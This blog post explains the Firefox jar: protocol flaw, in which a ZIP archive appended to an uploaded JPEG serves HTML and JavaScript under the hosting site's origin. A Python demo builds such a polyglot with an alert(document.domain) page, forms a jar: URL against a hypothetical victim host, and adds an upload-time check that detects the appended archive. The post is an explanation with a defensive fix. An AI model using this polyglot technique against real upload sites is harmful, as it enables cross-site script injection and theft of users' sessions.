JARs and Firefox: Uh-oh
So, this is an interestingly complicated issue that’s discussed in GNUCITIZEN’s blog in a lot more detail (1, 2, 3), but I’m posting it here in case someone finds it of interest. (super-executive summary: Bad things can happen with JavaScript due to some things nobody thought about too much.)
Basically, the main thing that keeps JavaScript from being incredibly dangerous in terms of stealing your access to websites like GMail (or anything else you log in to) is that a script is only allowed to read from the site it came from: same scheme, same host name, same port. That means that since things coming from my website (lardbucket.org) don’t have the same host name as Google’s services (www.google.com), they can’t get at the Google cookies or pages that identify you, so I can’t impersonate you. (I wouldn’t want to anyway, but it’s just an example.) It’s called the Same-Origin Policy, and it keeps things relatively safe. (Most of the time.)
Unfortunately, someone just realized that Firefox has an interesting protocol handler: jar. Firefox’s own interface files are packaged into JAR files (Java ARchives), and a JAR file is really just a ZIP file with a different name. To read things out of those archives, Firefox supports a special protocol (like “http” or “ftp”) named “jar”, written as jar:<URL of the archive>!/<path inside it>. The catch is that the archive URL doesn’t have to point at Firefox’s own files: it can point at anything Firefox can fetch, and whatever comes out of the archive is treated as if it came from the archive’s own server (its origin).
And JPEG files are still valid with a ZIP appended to the end (and the ZIP file is still valid too; try it). JPEG decoders stop reading at the end-of-image marker, and ZIP readers find the archive’s directory by looking at the end of the file, so neither side minds the other’s bytes. So, if you can upload an image file to someone’s server, you can hide an HTML page inside it, point someone at jar:http://that-server/the-image.jpg!/page.html, and make anyone with Firefox run whatever JavaScript code you want them to, with it appearing to come from that other server’s domain.
Through a combination of other minor and unrelated issues of varying severity (mostly not large, all well-known), that means you can run JavaScript code in the context of a site you don’t control, essentially around the Same-Origin Policy, which allows for a dangerous number of things. (Including, but not limited to, bad things like people being able to read your Google Account session, or whatever webmail you use, and such.)
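To make the mechanics concrete, here is an added example (mine, not code from GNUCITIZEN’s posts or from Firefox) that builds a JPEG/ZIP polyglot with Python’s standard library, reads the HTML back out of it the way any ZIP-based loader would, forms the matching jar: URL, and then shows the check an upload handler could run to reject such a file. The host name, file names and the minimal JPEG skeleton are constructed for the demo; a real photo works the same way.

```python
import io
import struct
import zipfile

JPEG_SOI = b"\xff\xd8"   # start of image
JPEG_EOI = b"\xff\xd9"   # end of image


def minimal_jpeg_skeleton() -> bytes:
    """Constructed stand-in for a real photo: SOI, one JFIF APP0 segment, EOI.
    It carries no scan data (so it renders as nothing), but it has the marker
    layout that the walker below and a real uploaded photo both present."""
    jfif = (b"JFIF\x00"                    # identifier
            + bytes([1, 1])                # JFIF version 1.1
            + bytes([0])                   # density units: none
            + struct.pack(">HH", 72, 72)   # X/Y density
            + bytes([0, 0]))               # no thumbnail
    app0 = b"\xff\xe0" + struct.pack(">H", len(jfif) + 2) + jfif
    return JPEG_SOI + app0 + JPEG_EOI


def make_polyglot(jpeg: bytes, inner_files: dict) -> bytes:
    """Append a ZIP archive to a JPEG. JPEG decoders stop at EOI and ignore
    the tail; ZIP readers locate the central directory from the end-of-
    central-directory record and ignore the head. Opening the buffer in 'a'
    mode makes zipfile write entry offsets relative to the start of the whole
    file, which is what a ZIP reader expects."""
    buf = io.BytesIO(jpeg)
    with zipfile.ZipFile(buf, "a", zipfile.ZIP_STORED) as zf:
        for name, data in inner_files.items():
            zf.writestr(name, data)
    return buf.getvalue()


def read_inner(polyglot: bytes, name: str) -> bytes:
    """What a ZIP-based loader (such as a jar: handler) sees in the file."""
    with zipfile.ZipFile(io.BytesIO(polyglot)) as zf:
        return zf.read(name)


def jar_url(host: str, path: str, inner: str) -> str:
    """jar:<archive URL>!/<entry>; the entry is treated as <host>'s content."""
    return "jar:http://%s/%s!/%s" % (host, path, inner)


def jpeg_end_offset(data: bytes) -> int:
    """Walk the JPEG marker segments and return the offset just past EOI.
    Anything after that offset is not part of the image. Raises ValueError
    on malformed input rather than guessing."""
    if data[:2] != JPEG_SOI:
        raise ValueError("missing SOI marker")
    pos = 2
    while True:
        if pos + 2 > len(data) or data[pos] != 0xFF:
            raise ValueError("expected marker at offset %d" % pos)
        marker = data[pos + 1]
        if marker == 0xD9:                                   # EOI
            return pos + 2
        if marker == 0xFF:                                   # fill byte
            pos += 1
            continue
        if marker == 0x01 or 0xD0 <= marker <= 0xD7:         # standalone
            pos += 2
            continue
        if pos + 4 > len(data):
            raise ValueError("truncated segment at offset %d" % pos)
        seg_len = struct.unpack(">H", data[pos + 2:pos + 4])[0]
        pos += 2 + seg_len
        if marker == 0xDA:                                   # SOS: skip scan
            while True:
                ff = data.find(b"\xff", pos)
                if ff < 0 or ff + 1 >= len(data):
                    raise ValueError("unterminated scan data")
                nxt = data[ff + 1]
                if nxt != 0x00 and not (0xD0 <= nxt <= 0xD7):
                    pos = ff                                 # a real marker
                    break
                pos = ff + 2                                 # stuffed FF/RSTn


def has_appended_zip(data: bytes) -> bool:
    """Upload-time check: a JPEG should end at EOI. Trailing bytes that form
    a ZIP end record mean a jar: style loader could serve pages out of it."""
    tail = data[jpeg_end_offset(data):]
    return len(tail) > 0 and zipfile.is_zipfile(io.BytesIO(data))


if __name__ == "__main__":
    # Constructed demo: a page that just shows which origin it runs under.
    page = b"<html><script>alert(document.domain)</script></html>"
    poly = make_polyglot(minimal_jpeg_skeleton(), {"page.html": page})
    print("image ends at byte", jpeg_end_offset(poly), "of", len(poly))
    print("ZIP entry contents:", read_inner(poly, "page.html"))
    # victim.example and the path are hypothetical.
    print("URL to hand a Firefox user:",
          jar_url("victim.example", "uploads/photo.jpg", "page.html"))
    print("upload check flags it:", has_appended_zip(poly))
    print("upload check on a plain JPEG:", has_appended_zip(minimal_jpeg_skeleton()))
```

The check rejects any ZIP riding after the image, but an upload handler can go further and simply reject trailing bytes of any kind, or re-encode every uploaded image server-side, which drops the appended archive along with everything else after EOI.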
Anyway, I found that interesting, so perhaps someone else might find it interesting as well. Perhaps not. If you’re interested in more details, check out the GNUCITIZEN links above.
Andy Schmitz